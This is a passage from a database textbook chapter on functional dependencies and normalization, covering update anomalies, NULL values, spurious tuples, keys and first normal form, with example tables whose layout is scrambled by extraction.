nothing wrong logically with these two relations, they violate Guideline 1 by mixing
attributes from distinct real-world entities: EMP_DEPT mixes attributes of employ-
ees and departments, and EMP_PROJ mixes attributes of employees and projects
and the WORKS_ON relationship. Hence, they fare poorly against the above meas-
ure of design quality. They may be used as views, but they cause problems when
used as base relations, as we discuss in the following section.

1.2 Redundant Information in Tuples
and Update Anomalies

One goal of schema design is to minimize the storage space used by the base rela-
tions (and hence the corresponding files). Grouping attributes into relation
schemas has a significant effect on storage space. For example, compare the space
used by the two base relations EMPLOYEE and DEPARTMENT in Figure 2 with that
for an EMP_DEPT base relation in Figure 4, which is the result of applying the
NATURAL JOIN operation to EMPLOYEE and DEPARTMENT. In EMP_DEPT, the
attribute values pertaining to a particular department (Dnumber, Dname, Dmgr_ssn)
are repeated for every employee who works for that department. In contrast, each
department’s information appears only once in the DEPARTMENT relation in Figure
2. Only the department number (Dnumber) is repeated in the EMPLOYEE relation
for each employee who works in that department as a foreign key. Similar com-
ments apply to the EMP_PROJ relation (see Figure 4), which augments the
WORKS_ON relation with additional attributes from EMPLOYEE and PROJECT.

Storing natural joins of base relations leads to an additional problem referred to as
update anomalies. These can be classified into insertion anomalies, deletion anom-
alies, and modification anomalies.2

Insertion Anomalies. Insertion anomalies can be differentiated into two types,
illustrated by the following examples based on the EMP_DEPT relation:

■ To insert a new employee tuple into EMP_DEPT, we must include either the
attribute values for the department that the employee works for, or NULLs (if
the employee does not work for a department as yet). For example, to insert
a new tuple for an employee who works in department number 5, we must
enter all the attribute values of department 5 correctly so that they are
consistent with the corresponding values for department 5 in other tuples in
EMP_DEPT. In the design of Figure 2, we do not have to worry about this
consistency problem because we enter only the department number in the
employee tuple; all other attribute values of department 5 are recorded only
once in the database, as a single tuple in the DEPARTMENT relation.

■ It is difficult to insert a new department that has no employees as yet in the
EMP_DEPT relation. The only way to do this is to place NULL values in the

2These anomalies were identified by Codd (1972a) to justify the need for normalization of relations, as
we shall discuss in Section 3.

514

Basics of Functional Dependencies and Normalization for Relational Databases

Ename

EMP_DEPT

Smith, John B.

Wong, Franklin T.

Zelaya, Alicia J.

Wallace, Jennifer S.

Narayan, Ramesh K.

English, Joyce A.

Jabbar, Ahmad V.

Borg, James E.

999887777

123456789

333445555

453453453

987654321

666884444

987987987

888665555 1937-11-10

Ssn

1968-07-19

1965-01-09

1955-12-08

1972-07-31

1969-03-29

1941-06-20

1962-09-15

Bdate

3321 Castle, Spring, TX

731 Fondren, Houston, TX 5

638 Voss, Houston, TX

5631 Rice, Houston, TX

980 Dallas, Houston, TX

450 Stone, Houston, TX

291 Berry, Bellaire, TX

975 FireOak, Humble, TX

Address

4

5

5

4

1

4

5

Administration

Research

Research

Research

Administration

Headquarters

Administration

Research

987654321

333445555

333445555

333445555

987654321

888665555

987654321

333445555

Dnumber Dname Dmgr_ssn

Ssn

EMP_PROJ

123456789

123456789

666884444

453453453

453453453

333445555

333445555

333445555

333445555

999887777

999887777

987987987

987987987

987654321

987654321

888665555

3

1

2

2

1

2

30

30

30

10

10

3

10

20

20

20

Pnumber

40.0

32.5

7.5

10.0

10.0

10.0

10.0

20.0

20.0

30.0

5.0

10.0

35.0

20.0

15.0

Null

Hours

Narayan, Ramesh K.

Smith, John B.

Smith, John B.

Wong, Franklin T.

Wong, Franklin T.

Wong, Franklin T.

Wong, Franklin T.

English, Joyce A.

English, Joyce A.

Zelaya, Alicia J.

Jabbar, Ahmad V.

Zelaya, Alicia J.

Jabbar, Ahmad V.

Wallace, Jennifer S.

Wallace, Jennifer S.

Borg, James E.

Ename

ProductZ

ProductX

ProductY

ProductY

ProductZ

Reorganization

ProductX

ProductY

Newbenefits

Newbenefits

Computerization

Computerization

Newbenefits

Reorganization

Reorganization

Houston

Bellaire

Sugarland

Sugarland

Houston

Stafford

Houston

Bellaire

Sugarland

Stafford

Stafford

Stafford

Stafford

Stafford

Houston

Houston

Pname Plocation

Computerization

Redundancy Redundancy

Redundancy

Figure 4
Sample states for EMP_DEPT and EMP_PROJ resulting from applying NATURAL JOIN to the
relations in Figure 2. These may be stored as base relations for performance reasons.

attributes for employee. This violates the entity integrity for EMP_DEPT
because Ssn is its primary key. Moreover, when the first employee is assigned
to that department, we do not need this tuple with NULL values any more.
This problem does not occur in the design of Figure 2 because a department
is entered in the DEPARTMENT relation whether or not any employees work
for it, and whenever an employee is assigned to that department, a corre-
sponding tuple is inserted in EMPLOYEE.

515

Basics of Functional Dependencies and Normalization for Relational Databases

Deletion Anomalies. The problem of deletion anomalies is related to the second
insertion anomaly situation just discussed. If we delete from EMP_DEPT an
employee tuple that happens to represent the last employee working for a particular
department, the information concerning that department is lost from the database.
This problem does not occur in the database of Figure 2 because DEPARTMENT
tuples are stored separately.

Modification Anomalies. In EMP_DEPT, if we change the value of one of the
attributes of a particular department—say, the manager of department 5—we must
update the tuples of all employees who work in that department; otherwise, the
database will become inconsistent. If we fail to update some tuples, the same depart-
ment will be shown to have two different values for manager in different employee
tuples, which would be wrong.3

It is easy to see that these three anomalies are undesirable and cause difficulties to
maintain consistency of data as well as require unnecessary updates that can be
avoided; hence, we can state the next guideline as follows.

Guideline 2
Design the base relation schemas so that no insertion, deletion, or modification
anomalies are present in the relations. If any anomalies are present,4 note them
clearly and make sure that the programs that update the database will operate
correctly.

The second guideline is consistent with and, in a way, a restatement of the first
guideline. We can also see the need for a more formal approach to evaluating
whether a design meets these guidelines. Sections 2 through 4 provide these needed
formal concepts. It is important to note that these guidelines may sometimes have to
be violated in order to improve the performance of certain queries. If EMP_DEPT is
used as a stored relation (known otherwise as a materialized view) in addition to the
base relations of EMPLOYEE and DEPARTMENT, the anomalies in EMP_DEPT must
be noted and accounted for (for example, by using triggers or stored procedures
that would make automatic updates). This way, whenever the base relation is
updated, we do not end up with inconsistencies. In general, it is advisable to use
anomaly-free base relations and to specify views that include the joins for placing
together the attributes frequently referenced in important queries.

1.3 NULL Values in Tuples
In some schema designs we may group many attributes together into a “fat” rela-
tion. If many of the attributes do not apply to all tuples in the relation, we end up
with many NULLs in those tuples. This can waste space at the storage level and may

3This is not as serious as the other problems, because all tuples can be updated by a single SQL query.
4Other application considerations may dictate and make certain anomalies unavoidable. For example, the
EMP_DEPT relation may correspond to a query or a report that is frequently required.

516

Basics of Functional Dependencies and Normalization for Relational Databases

also lead to problems with understanding the meaning of the attributes and with
specifying JOIN operations at the logical level.5 Another problem with NULLs is how
to account for them when aggregate operations such as COUNT or SUM are applied.
SELECT and JOIN operations involve comparisons; if NULL values are present, the
results may become unpredictable.6 Moreover, NULLs can have multiple interpreta-
tions, such as the following:

■ The attribute does not apply to this tuple. For example, Visa_status may not
apply to U.S. students.

■ The attribute value for this tuple is unknown. For example, the Date_of_birth
may be unknown for an employee.

■ The value is known but absent; that is, it has not been recorded yet. For exam-
ple, the Home_Phone_Number for an employee may exist, but may not be
available and recorded yet.

Having the same representation for all NULLs compromises the different meanings
they may have. Therefore, we may state another guideline.

Guideline 3
As far as possible, avoid placing attributes in a base relation whose values may fre-
quently be NULL. If NULLs are unavoidable, make sure that they apply in exceptional
cases only and do not apply to a majority of tuples in the relation.

Using space efficiently and avoiding joins with NULL values are the two overriding
criteria that determine whether to include the columns that may have NULLs in a
relation or to have a separate relation for those columns (with the appropriate key
columns). For example, if only 15 percent of employees have individual offices,
there is little justification for including an attribute Office_number in the EMPLOYEE
relation; rather, a relation EMP_OFFICES(Essn, Office_number) can be created to
include tuples for only the employees with individual offices.

1.4 Generation of Spurious Tuples
Consider the two relation schemas EMP_LOCS and EMP_PROJ1 in Figure 5(a),
which can be used instead of the single EMP_PROJ relation in Figure 3(b). A tuple in
EMP_LOCS means that the employee whose name is Ename works on some project
whose location is Plocation. A tuple in EMP_PROJ1 refers to the fact that the
employee whose Social Security number is Ssn works Hours per week on the project
whose name, number, and location are Pname, Pnumber, and Plocation. Figure 5(b)
shows relation states of EMP_LOCS and EMP_PROJ1 corresponding to the

5This is because inner and outer joins produce different results when NULLs are involved in joins. The
users must thus be aware of the different meanings of the various types of joins. Although this is reason-
able for sophisticated users, it may be difficult for others.
6Recall comparisons involving NULL values where the outcome (in three-valued logic) are TRUE,
FALSE, and UNKNOWN.

517

Basics of Functional Dependencies and Normalization for Relational Databases

Ssn Pnumber Hours Pname Plocation

Ename

P.K.

EMP_PROJ1

Plocation

P.K.

EMP_LOCS

Ename
Smith, John B.
Smith, John B.
Narayan, Ramesh K.
English, Joyce A.
English, Joyce A.
Wong, Franklin T.
Wong, Franklin T.
Wong, Franklin T.
Zelaya, Alicia J.
Jabbar, Ahmad V.
Wallace, Jennifer S.
Wallace, Jennifer S.
Borg, James E.

Houston

Bellaire
Sugarland

Sugarland

Bellaire
Sugarland

Stafford

Houston

Stafford
Houston

Houston
Stafford
Stafford

Plocation

(b)

(a)

EMP_PROJ1

Ssn
123456789
123456789

666884444

453453453

453453453

333445555

333445555

333445555

333445555

999887777
999887777

987987987

987987987

987654321

987654321

888665555

3

1

2

2

1

2

30

30

30

10

10

3
10

20

20

20

Pnumber

40.0

32.5

7.5

10.0

10.0

10.0

10.0

20.0

20.0

30.0

5.0

10.0

35.0

20.0

15.0

NULL

ProductZ

ProductX

ProductY

ProductY

ProductZ

Computerization

Reorganization

ProductX

ProductY

Newbenefits

Newbenefits

Computerization

Computerization

Newbenefits

Reorganization

Reorganization

Houston

Bellaire

Sugarland

Sugarland

Houston

Stafford

Houston

Bellaire

Sugarland

Stafford

Stafford

Stafford

Stafford

Stafford

Houston

Houston

Hours Pname Plocation

EMP_LOCS
Figure 5
Particularly poor design for the EMP_PROJ relation in
Figure 3(b). (a) The two relation schemas EMP_LOCS
and EMP_PROJ1. (b) The result of projecting the exten-
sion of EMP_PROJ from Figure 4 onto the relations
EMP_LOCS and EMP_PROJ1.

EMP_PROJ relation in Figure 4, which are obtained by applying the appropriate
PROJECT (π) operations to EMP_PROJ (ignore the dashed lines in Figure 5(b) for
now).

Suppose that we used EMP_PROJ1 and EMP_LOCS as the base relations instead of
EMP_PROJ. This produces a particularly bad schema design because we cannot
recover the information that was originally in EMP_PROJ from EMP_PROJ1 and
EMP_LOCS. If we attempt a NATURAL JOIN operation on EMP_PROJ1 and
EMP_LOCS, the result produces many more tuples than the original set of tuples in
EMP_PROJ. In Figure 6, the result of applying the join to only the tuples above the
dashed lines in Figure 5(b) is shown (to reduce the size of the resulting relation).
Additional tuples that were not in EMP_PROJ are called spurious tuples because

518

Basics of Functional Dependencies and Normalization for Relational Databases

Ssn
123456789

123456789

123456789

123456789

123456789

666884444

666884444

453453453

453453453

453453453

453453453

453453453

333445555

333445555

333445555

333445555

2

1

1

3

2

2

2

2

2

2

2

3

1

1

2

3

Pnumber

7.5

32.5

32.5

40.0

40.0

20.0

20.0

7.5

7.5

20.0

10.0

20.0

20.0

10.0

10.0

10.0

Hours

ProductY

ProductX

ProductX

ProductZ

ProductZ

ProductX

ProductX

ProductY

ProductY

ProductY

ProductY

ProductY

ProductY

ProductY

ProductY

ProductZ

Pname

Sugarland

Bellaire

Bellaire

Houston

Houston

Bellaire

Bellaire

Sugarland

Sugarland

Sugarland

Sugarland

Sugarland

Sugarland

Sugarland

Sugarland

Houston
333445555 3 10.0 ProductZ Houston

333445555 10 10.0 Computerization Stafford
333445555 20 10.0 Reorganization Houston

333445555 20

*

*

*

*

*

*

*

*

*

*

*

10.0 Reorganization Houston

Smith, John B.

Smith, John B.

English, Joyce A.

Narayan, Ramesh K.

Wong, Franklin T.

Smith, John B.

English, Joyce A.

English, Joyce A.

Wong, Franklin T.

Smith, John B.

Smith, John B.

English, Joyce A.

Wong, Franklin T.

English, Joyce A.

Wong, Franklin T.

Narayan, Ramesh K.
Wong, Franklin T.

Wong, Franklin T.
Narayan, Ramesh K.

Wong, Franklin T.

Plocation Ename

*
*

*

Figure 6
Result of applying NATURAL JOIN to the tuples above the dashed lines in
EMP_PROJ1 and EMP_LOCS of Figure 5. Generated spurious tuples are
marked by asterisks.

they represent spurious information that is not valid. The spurious tuples are
marked by asterisks (*) in Figure 6.

Decomposing EMP_PROJ into EMP_LOCS and EMP_PROJ1 is undesirable because
when we JOIN them back using NATURAL JOIN, we do not get the correct original
information. This is because in this case Plocation is the attribute that relates
EMP_LOCS and EMP_PROJ1, and Plocation is neither a primary key nor a foreign
key in either EMP_LOCS or EMP_PROJ1. We can now informally state another
design guideline.

Guideline 4
Design relation schemas so that they can be joined with equality conditions on
attributes that are appropriately related (primary key, foreign key) pairs in a way
that guarantees that no spurious tuples are generated. Avoid relations that contain

519

Basics of Functional Dependencies and Normalization for Relational Databases

matching attributes that are not (foreign key, primary key) combinations because
joining on such attributes may produce spurious tuples.

This informal guideline obviously needs to be stated more formally. There is a for-
mal condition called the nonadditive (or lossless) join property that guarantees that
certain joins do not produce spurious tuples.

1.5 Summary and Discussion of Design Guidelines
In Sections 1.1 through 1.4, we informally discussed situations that lead to prob-
lematic relation schemas and we proposed informal guidelines for a good relational
design. The problems we pointed out, which can be detected without additional
tools of analysis, are as follows:

■ Anomalies that cause redundant work to be done during insertion into and
modification of a relation, and that may cause accidental loss of information
during a deletion from a relation

■ Waste of storage space due to NULLs and the difficulty of performing selec-
tions, aggregation operations, and joins due to NULL values

■ Generation of invalid and spurious data during joins on base relations with
matched attributes that may not represent a proper (foreign key, primary
key) relationship

In the rest of this chapter we present formal concepts and theory that may be used
to define the goodness and badness of individual relation schemas more precisely.
First we discuss functional dependency as a tool for analysis. Then we specify the
three normal forms and Boyce-Codd normal form (BCNF) for relation schemas.
The strategy for achieving a good design is to decompose a badly designed relation
appropriately. We also briefly introduce additional normal forms that deal with
additional dependencies.

2 Functional Dependencies
So far we have dealt with the informal measures of database design. We now intro-
duce a formal tool for analysis of relational schemas that enables us to detect and
describe some of the above-mentioned problems in precise terms. The single most
important concept in relational schema design theory is that of a functional
dependency. In this section we formally define the concept, and in Section 3 we see
how it can be used to define normal forms for relation schemas.

2.1 Definition of Functional Dependency
A functional dependency is a constraint between two sets of attributes from the
database. Suppose that our relational database schema has n attributes A1, A2, …,
An; let us think of the whole database as being described by a single universal

520

Basics of Functional Dependencies and Normalization for Relational Databases

relation schema R = {A1, A2, … , An}.
7 We do not imply that we will actually store the

database as a single universal table; we use this concept only in developing the for-
mal theory of data dependencies.8

Definition. A functional dependency, denoted by X → Y, between two sets of
attributes X and Y that are subsets of R specifies a constraint on the possible
tuples that can form a relation state r of R. The constraint is that, for any two
tuples t1 and t2 in r that have t1[X] = t2[X], they must also have t1[Y] = t2[Y].

This means that the values of the Y component of a tuple in r depend on, or are
determined by, the values of the X component; alternatively, the values of the X com-
ponent of a tuple uniquely (or functionally) determine the values of the Y compo-
nent. We also say that there is a functional dependency from X to Y, or that Y is
functionally dependent on X. The abbreviation for functional dependency is FD or
f.d. The set of attributes X is called the left-hand side of the FD, and Y is called the
right-hand side.

Thus, X functionally determines Y in a relation schema R if, and only if, whenever
two tuples of r(R) agree on their X-value, they must necessarily agree on their Y-
value. Note the following:

■ If a constraint on R states that there cannot be more than one tuple with a
given X-value in any relation instance r(R)—that is, X is a candidate key of
R—this implies that X → Y for any subset of attributes Y of R (because the
key constraint implies that no two tuples in any legal state r(R) will have the
same value of X). If X is a candidate key of R, then X → R.

■ If X → Y in R, this does not say whether or not Y → X in R.

A functional dependency is a property of the semantics or meaning of the attrib-
utes. The database designers will use their understanding of the semantics of the
attributes of R—that is, how they relate to one another—to specify the functional
dependencies that should hold on all relation states (extensions) r of R. Whenever
the semantics of two sets of attributes in R indicate that a functional dependency
should hold, we specify the dependency as a constraint. Relation extensions r(R)
that satisfy the functional dependency constraints are called legal relation states (or
legal extensions) of R. Hence, the main use of functional dependencies is to
describe further a relation schema R by specifying constraints on its attributes that
must hold at all times. Certain FDs can be specified without referring to a specific
relation, but as a property of those attributes given their commonly understood
meaning. For example, {State, Driver_license_number} → Ssn should hold for any
adult in the United States and hence should hold whenever these attributes appear
in a relation. It is also possible that certain functional dependencies may cease to

7This concept of a universal relation is important in the discussion of algorithms for relational database
design.
8This assumption implies that every attribute in the database should have a distinct name.

521

Basics of Functional Dependencies and Normalization for Relational Databases

TEACH

Teacher
Smith

Smith

Hall

Brown

Bartram

Martin

Hoffman

Horowitz

Compilers

Data Structures

Data Management

Data Structures

Course Text
Figure 7
A relation state of TEACH with a
possible functional dependency
TEXT → COURSE. However,
TEACHER → COURSE is ruled
out.

exist in the real world if the relationship changes. For example, the FD Zip_code →
Area_code used to exist as a relationship between postal codes and telephone num-
ber codes in the United States, but with the proliferation of telephone area codes it
is no longer true.

Consider the relation schema EMP_PROJ in Figure 3(b); from the semantics of the
attributes and the relation, we know that the following functional dependencies
should hold:

a. Ssn → Ename
b. Pnumber →{Pname, Plocation}
c. {Ssn, Pnumber} → Hours

These functional dependencies specify that (a) the value of an employee’s Social
Security number (Ssn) uniquely determines the employee name (Ename), (b) the
value of a project’s number (Pnumber) uniquely determines the project name
(Pname) and location (Plocation), and (c) a combination of Ssn and Pnumber values
uniquely determines the number of hours the employee currently works on the
project per week (Hours). Alternatively, we say that Ename is functionally determined
by (or functionally dependent on) Ssn, or given a value of Ssn, we know the value of
Ename, and so on.

A functional dependency is a property of the relation schema R, not of a particular
legal relation state r of R. Therefore, an FD cannot be inferred automatically from a
given relation extension r but must be defined explicitly by someone who knows the
semantics of the attributes of R. For example, Figure 7 shows a particular state of the
TEACH relation schema. Although at first glance we may think that Text → Course,
we cannot confirm this unless we know that it is true for all possible legal states of
TEACH. It is, however, sufficient to demonstrate a single counterexample to disprove
a functional dependency. For example, because ‘Smith’ teaches both ‘Data
Structures’ and ‘Data Management,’ we can conclude that Teacher does not function-
ally determine Course.

Given a populated relation, one cannot determine which FDs hold and which do
not unless the meaning of and the relationships among the attributes are known. All
one can say is that a certain FD may exist if it holds in that particular extension. One
cannot guarantee its existence until the meaning of the corresponding attributes is
clearly understood. One can, however, emphatically state that a certain FD does not

522

Basics of Functional Dependencies and Normalization for Relational Databases

Figure 8
A relation R (A, B, C, D)
with its extension.

A B C D

a1 b1 c1 d1

a1 b2 c2 d2

a2 b2 c2 d3

a3 b3 c4 d3

hold if there are tuples that show the violation of such an FD. See the illustrative
example relation in Figure 8. Here, the following FDs may hold because the four
tuples in the current extension have no violation of these constraints: B → C;
C → B; {A, B} → C; {A, B} → D; and {C, D} → B. However, the following do not
hold because we already have violations of them in the given extension: A → B
(tuples 1 and 2 violate this constraint); B → A (tuples 2 and 3 violate this con-
straint); D → C (tuples 3 and 4 violate it).

Figure 3 introduces a diagrammatic notation for displaying FDs: Each FD is dis-
played as a horizontal line. The left-hand-side attributes of the FD are connected by
vertical lines to the line representing the FD, while the right-hand-side attributes are
connected by the lines with arrows pointing toward the attributes.

We denote by F the set of functional dependencies that are specified on relation
schema R. Typically, the schema designer specifies the functional dependencies that
are semantically obvious; usually, however, numerous other functional dependencies
hold in all legal relation instances among sets of attributes that can be derived from
and satisfy the dependencies in F. Those other dependencies can be inferred or
deduced from the FDs in F.

3 Normal Forms Based on Primary Keys
Having introduced functional dependencies, we are now ready to use them to spec-
ify some aspects of the semantics of relation schemas. We assume that a set of func-
tional dependencies is given for each relation, and that each relation has a
designated primary key; this information combined with the tests (conditions) for
normal forms drives the normalization process for relational schema design. Most
practical relational design projects take one of the following two approaches:

■ Perform a conceptual schema design using a conceptual model such as ER or
EER and map the conceptual design into a set of relations

■ Design the relations based on external knowledge derived from an existing
implementation of files or forms or reports

Following either of these approaches, it is then useful to evaluate the relations for
goodness and decompose them further as needed to achieve higher normal forms,
using the normalization theory presented in this chapter and the next. We focus in

523

Basics of Functional Dependencies and Normalization for Relational Databases

this section on the first three normal forms for relation schemas and the intuition
behind them, and discuss how they were developed historically. More general defi-
nitions of these normal forms, which take into account all candidate keys of a rela-
tion rather than just the primary key, are deferred to Section 4.

We start by informally discussing normal forms and the motivation behind their
development, as well as reviewing some definitions that are needed here. Then we
discuss the first normal form (1NF) in Section 3.4, and present the definitions of
second normal form (2NF) and third normal form (3NF), which are based on pri-
mary keys, in Sections 3.5 and 3.6, respectively.

3.1 Normalization of Relations
The normalization process, as first proposed by Codd (1972a), takes a relation
schema through a series of tests to certify whether it satisfies a certain normal form.
The process, which proceeds in a top-down fashion by evaluating each relation
against the criteria for normal forms and decomposing relations as necessary, can
thus be considered as relational design by analysis. Initially, Codd proposed three
normal forms, which he called first, second, and third normal form. A stronger def-
inition of 3NF—called Boyce-Codd normal form (BCNF)—was proposed later by
Boyce and Codd. All these normal forms are based on a single analytical tool: the
functional dependencies among the attributes of a relation. Later, a fourth normal
form (4NF) and a fifth normal form (5NF) were proposed, based on the concepts of
multivalued dependencies and join dependencies, respectively; these are briefly dis-
cussed in Sections 6 and 7.

Normalization of data can be considered a process of analyzing the given relation
schemas based on their FDs and primary keys to achieve the desirable properties of
(1) minimizing redundancy and (2) minimizing the insertion, deletion, and update
anomalies discussed in Section 1.2. It can be considered as a “filtering” or “purifica-
tion” process to make the design have successively better quality. Unsatisfactory
relation schemas that do not meet certain conditions—the normal form tests—are
decomposed into smaller relation schemas that meet the tests and hence possess the
desirable properties. Thus, the normalization procedure provides database design-
ers with the following:

■ A formal framework for analyzing relation schemas based on their keys and
on the functional dependencies among their attributes

■ A series of normal form tests that can be carried out on individual relation
schemas so that the relational database can be normalized to any desired
degree

Definition. The normal form of a relation refers to the highest normal form
condition that it meets, and hence indicates the degree to which it has been nor-
malized.

Normal forms, when considered in isolation from other factors, do not guarantee a
good database design. It is generally not sufficient to check separately that each

524

Basics of Functional Dependencies and Normalization for Relational Databases

relation schema in the database is, say, in BCNF or 3NF. Rather, the process of nor-
malization through decomposition must also confirm the existence of additional
properties that the relational schemas, taken together, should possess. These would
include two properties:

■ The nonadditive join or lossless join property, which guarantees that the
spurious tuple generation problem discussed in Section 1.4 does not occur
with respect to the relation schemas created after decomposition.

■ The dependency preservation property, which ensures that each functional
dependency is represented in some individual relation resulting after
decomposition.

The nonadditive join property is extremely critical and must be achieved at any
cost, whereas the dependency preservation property, although desirable, is some-
times sacrificed.

3.2 Practical Use of Normal Forms
Most practical design projects acquire existing designs of databases from previous
designs, designs in legacy models, or from existing files. Normalization is carried
out in practice so that the resulting designs are of high quality and meet the desir-
able properties stated previously. Although several higher normal forms have been
defined, such as the 4NF and 5NF that we discuss in Sections 6 and 7, the practical
utility of these normal forms becomes questionable when the constraints on which
they are based are rare, and hard to understand or to detect by the database design-
ers and users who must discover these constraints. Thus, database design as prac-
ticed in industry today pays particular attention to normalization only up to 3NF,
BCNF, or at most 4NF.

Another point worth noting is that the database designers need not normalize to the
highest possible normal form. Relations may be left in a lower normalization status,
such as 2NF, for performance reasons, such as those discussed at the end of Section
1.2. Doing so incurs the corresponding penalties of dealing with the anomalies.

Definition. Denormalization is the process of storing the join of higher nor-
mal form relations as a base relation, which is in a lower normal form.

3.3 Definitions of Keys and Attributes
Participating in Keys

Before proceeding further, let’s look again at the definitions of keys of a relation
schema.

Definition. A superkey of a relation schema R = {A1, A2, … , An} is a set of
attributes S ⊆ R with the property that no two tuples t1 and t2 in any legal rela-
tion state r of R will have t1[S] = t2[S]. A key K is a superkey with the additional
property that removal of any attribute from K will cause K not to be a superkey
any more.

525

Basics of Functional Dependencies and Normalization for Relational Databases

The difference between a key and a superkey is that a key has to be minimal; that is,
if we have a key K = {A1, A2, …, Ak} of R, then K – {Ai} is not a key of R for any Ai, 1
≤ i ≤ k. In Figure 1, {Ssn} is a key for EMPLOYEE, whereas {Ssn}, {Ssn, Ename}, {Ssn,
Ename, Bdate}, and any set of attributes that includes Ssn are all superkeys.

If a relation schema has more than one key, each is called a candidate key. One of
the candidate keys is arbitrarily designated to be the primary key, and the others are
called secondary keys. In a practical relational database, each relation schema must
have a primary key. If no candidate key is known for a relation, the entire relation
can be treated as a default superkey. In Figure 1, {Ssn} is the only candidate key for
EMPLOYEE, so it is also the primary key.

Definition. An attribute of relation schema R is called a prime attribute of R if
it is a member of some candidate key of R. An attribute is called nonprime if it
is not a prime attribute—that is, if it is not a member of any candidate key.

In Figure 1, both Ssn and Pnumber are prime attributes of WORKS_ON, whereas
other attributes of WORKS_ON are nonprime.

We now present the first three normal forms: 1NF, 2NF, and 3NF. These were pro-
posed by Codd (1972a) as a sequence to achieve the desirable state of 3NF relations
by progressing through the intermediate states of 1NF and 2NF if needed. As we
shall see, 2NF and 3NF attack different problems. However, for historical reasons, it
is customary to follow them in that sequence; hence, by definition a 3NF relation
already satisfies 2NF.

3.4 First Normal Form
First normal form (1NF) is now considered to be part of the formal definition of a
relation in the basic (flat) relational model; historically, it was defined to disallow
multivalued attributes, composite attributes, and their combinations. It states that
the domain of an attribute must include only atomic (simple, indivisible) values and
that the value of any attribute in a tuple must be a single value from the domain of
that attribute. Hence, 1NF disallows having a set of values, a tuple of values, or a
combination of both as an attribute value for a single tuple. In other words, 1NF dis-
allows relations within relations or relations as attribute values within tuples. The only
attribute values permitted by 1NF are single atomic (or indivisible) values.

Consider the DEPARTMENT relation schema shown in Figure 1, whose primary key
is Dnumber, and suppose that we extend it by including the Dlocations attribute as
shown in Figure 9(a). We assume that each department can have a number of loca-
tions. The DEPARTMENT schema and a sample relation state are shown in Figure 9.
As we can see, this is not in 1NF because Dlocations is not an atomic attribute, as
illustrated by the first tuple in Figure 9(b). There are two ways we can look at the
Dlocations attribute:

■ The domain of Dlocations contains atomic values, but some tuples can have a
set of these values. In this case, Dlocations is not functionally dependent on
the primary key Dnumber.

526

Basics of Functional Dependencies and Normalization for Relational Databases

Dname
DEPARTMENT
(a)

DEPARTMENT
(b)

DEPARTMENT
(c)

Dnumber Dmgr_ssn Dlocations

Dname
Research

Administration

Headquarters 1

5

4

Dnumber

888665555

333445555

987654321

Dmgr_ssn

{Houston}

{Bellaire, Sugarland, Houston}

{Stafford}

Dlocations

Dname
Research

Research

Research

Administration

Headquarters

Bellaire

Sugarland

Houston

Stafford

Houston

5

5

5

4

1

Dnumber

333445555

333445555

333445555

987654321

888665555

Dmgr_ssn Dlocation
Figure 9
Normalization into 1NF. (a) A
relation schema that is not in
1NF. (b) Sample state of
relation DEPARTMENT. (c)
1NF version of the same
relation with redundancy.

■ The domain of Dlocations contains sets of values and hence is nonatomic. In
this case, Dnumber → Dlocations because each set is considered a single mem-
ber of the attribute domain.9

In either case, the DEPARTMENT relation in Figure 9 is not in 1NF; in fact, it does
not even qualify as a relation. There are three main techniques to achieve first nor-
mal form for such a relation:

1. Remove the attribute Dlocations that violates 1NF and place it in a separate
relation DEPT_LOCATIONS along with the primary key Dnumber of
DEPARTMENT. The primary key of this relation is the combination
{Dnumber, Dlocation}, as shown in Figure 2. A distinct tuple in
DEPT_LOCATIONS exists for each location of a department. This decomposes
the non-1NF relation into two 1NF relations.

9In this case we can consider the domain of Dlocations to be the power set of the set of single loca-
tions; that is, the domain is made up of all possible subsets of the set of single locations.

527

Basics of Functional Dependencies and Normalization for Relational Databases

2. Expand the key so that there will be a separate tuple in the original
DEPARTMENT relation for each location of a DEPARTMENT, as shown in
Figure 9(c). In this case, the primary key becomes the combination
{Dnumber, Dlocation}. This solution has the disadvantage of introducing
redundancy in the relation.

3. If a maximum number of values is known for the attribute—for example, if it
is known that at most three locations can exist for a department—replace the
Dlocations attribute by three atomic attributes: Dlocation1, Dlocation2, and
Dlocation3. This solution has the disadvantage of introducing NULL values if
most departments have fewer than three locations. It further introduces spu-
rious semantics about the ordering among the location values that is not
originally intended. Querying on this attribute becomes more difficult; for
example, consider how you would write the query: List the departments that
have ‘Bellaire’ as one of their locations in this design.

Of the three solutions above, the first is generally considered best because it does
not suffer from redundancy and it is completely general, having no limit placed on
a maximum number of values. In fact, if we choose the second solution, it will be
decomposed further during subsequent normalization steps into the first solution.

First normal form also disallows multivalued attributes that are themselves com-
posite. These are called nested relations because each tuple can have a relation
within it. Figure 10 shows how the EMP_PROJ relation could appear if nesting is
allowed. Each tuple represents an employee entity, and a relation PROJS(Pnumber,
Hours) within each tuple represents the employee’s projects and the hours per week
that employee works on each project. The schema of this EMP_PROJ relation can be
represented as follows:

EMP_PROJ(Ssn, Ename, {PROJS(Pnumber, Hours)})

The set braces { } identify the attribute PROJS as multivalued, and we list the com-
ponent attributes that form PROJS between parentheses ( ). Interestingly, recent
trends for supporting complex objects and XML data attempt to allow and formal-
ize nested relations within relational database systems, which were disallowed early
on by 1NF.

Notice that Ssn is the primary key of the EMP_PROJ relation in Figures 10(a) and
(b), while Pnumber is the partial key of the nested relation; that is, within each tuple,
the nested relation must have unique values of Pnumber. To normalize this into 1NF,
we remove the nested relation attributes into a new relation and propagate the pri-
mary key into it; the primary key of the new relation will combine the partial key
with the primary key of the original relation. Decomposition and primary key
propagation yield the schemas EMP_PROJ1 and EMP_PROJ2, as shown in Figure
10(c).

This procedure can be applied recursively to a relation with multiple-level nesting
to unnest the relation into a set of 1NF relations. This is useful in converting an
unnormalized relation schema with many levels of nesting into 1NF relations. The

528

Basics of Functional Dependencies and Normalization for Relational Databases

EMP_PROJ
(a)

Projs
Pnumber HoursSsn Ename

EMP_PROJ1
(c)

Ssn Ename

EMP_PROJ2

HoursSsn Pnumber

EMP_PROJ
(b)

Ssn

123456789

666884444

453453453

333445555

999887777

987987987

987654321

888665555

Zelaya, Alicia J.

Jabbar, Ahmad V.

Wallace, Jennifer S.

Borg, James E.

32.5

7.5
40.0

20.0

20.0

10.0
10.0

10.0

10.0

30.0
10.0

35.0

5.0
20.0

15.0

NULL

English, Joyce A.

Narayan, Ramesh K.

Smith, John B.

Wong, Franklin T.

Ename

3

1

2

1

2

2

20

3

10

30
10

10

20

30
30

20

Pnumber Hours

Figure 10
Normalizing nested rela-
tions into 1NF. (a)
Schema of the
EMP_PROJ relation with
a nested relation attribute
PROJS. (b) Sample
extension of the
